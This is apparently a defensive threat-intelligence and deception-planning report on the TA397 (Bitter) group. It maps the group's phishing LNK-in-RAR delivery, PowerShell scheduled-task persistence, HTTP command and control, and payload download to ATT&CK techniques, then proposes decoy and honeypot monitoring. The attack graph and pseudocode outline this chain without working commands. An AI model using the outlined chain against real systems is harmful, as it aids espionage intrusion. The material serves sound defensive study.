Subject: Engage Report: TA397 RATs War
Tactics: TA0003 Persistence
Technique: T1053.005 Scheduled Task/Job: Scheduled Task
Procedure:
TA397 utilizes a malicious shortcut (LNK) file embedded within a RAR archive. This LNK file, when activated, executes PowerShell code that creates a scheduled task on the victim’s machine. This scheduled task enables the download and execution of additional payloads, establishing persistence on the compromised system.
Vulnerability: EAV0001 When adversaries interact with the environment or personas, they are vulnerable when they collect, observe, or manipulate system artifacts or information. Manipulated data may cause them to reveal behaviors, use additional or more advanced capabilities against the target, and/or impact their dwell time., EAV0004 When adversaries use phishing emails to gain access to victim systems, they have no control over where a malicious attachment is detonated from, or where a link is clicked.
Engagement Opportunity:
Deploy a decoy system with a vulnerable configuration that allows for the creation of scheduled tasks. Monitor the decoy for attempts to create or modify scheduled tasks, indicating adversary activity. This provides an opportunity to observe T1053.005 in action and gather intelligence on the adversary’s tools, techniques, and procedures (TTPs).
Threat Actor: TA397 (also known as Bitter)
Threat Objective:
To establish persistence on the victim’s machine and deploy additional malware for espionage and intelligence gathering purposes.
Deception Opportunity:
Set up a honeypot with decoy files and folders that mimic those typically targeted by TA397. Monitor this honeypot for any unauthorized access attempts, especially those related to scheduled tasks and the execution of suspicious commands. This could reveal the adversary’s presence and their intended actions.
Sensor Data Placement: User-Mode
Observable Level: Core to Some Implementations of (Sub-)Technique
Scoring Rationale:
The abuse of scheduled tasks for persistence is a prevalent technique employed by various threat actors, including TA397. While not all attacks rely on this method, it is common enough to be considered a core implementation of this sub-technique.
Link to Report:
Link to Report II.:
Additional Comments:
Monitoring scheduled task activity and implementing robust detection mechanisms for suspicious commands can significantly improve the security posture against threats like TA397.
Possible elements: Fake Windows System Files
MSG (Pseudocode):
# Malicious Sub-Graph Standard
# Node Format:
# [Node ID]: [Tactic] - [Technique] - [Procedure] ([Observable Level])
# Edge Format:
# [Source Node ID] --> [Destination Node ID] ([Exploited Vulnerability])
# Example: TA397 Attack Graph
[1]: Initial Access [TA0001] - Phishing [T1566]: Spearphishing Attachment [T1566.001] - Deliver malicious LNK file within a RAR archive (Core to Some Implementations of (Sub-)Technique)
[2]: Persistence [TA0003] - Scheduled Task/Job [T1053]: Scheduled Task [T1053.005] - Create scheduled task using PowerShell code embedded in the LNK file (Core to Some Implementations of (Sub-)Technique)
[3]: Command and Control [TA0011] - Application Layer Protocol [T1071]: Web Protocols [T1071.001] - Communicate with C2 server using HTTP (Lack of Network Monitoring)
[4]: Execution [TA0002] - Command and Scripting Interpreter [T1059]: Windows Command Shell [T1059.003] - Execute commands to download and run additional payloads (Lack of User Awareness)
1 --> 2
2 --> 3
3 --> 4
# Pseudocode Standard
# Function Format:
# function [Tactic]_[Technique]([Input]):
# [Procedure]
# return [Output]
# Example: TA397 Pseudocode
function Initial_Access_Phishing(target_email):
# Craft phishing email with malicious RAR archive containing LNK file
# Send email to target_email
return malicious_lnk_file
function Persistence_Scheduled_Task_Job(malicious_lnk_file):
# Execute PowerShell code from LNK file to create scheduled task
return scheduled_task
function Command_and_Control_Application_Layer_Protocol(scheduled_task):
# Use scheduled task to communicate with C2 server
return commands
function Execution_Command_and_Scripting_Interpreter(commands):
# Execute commands to download and run additional payloads
return success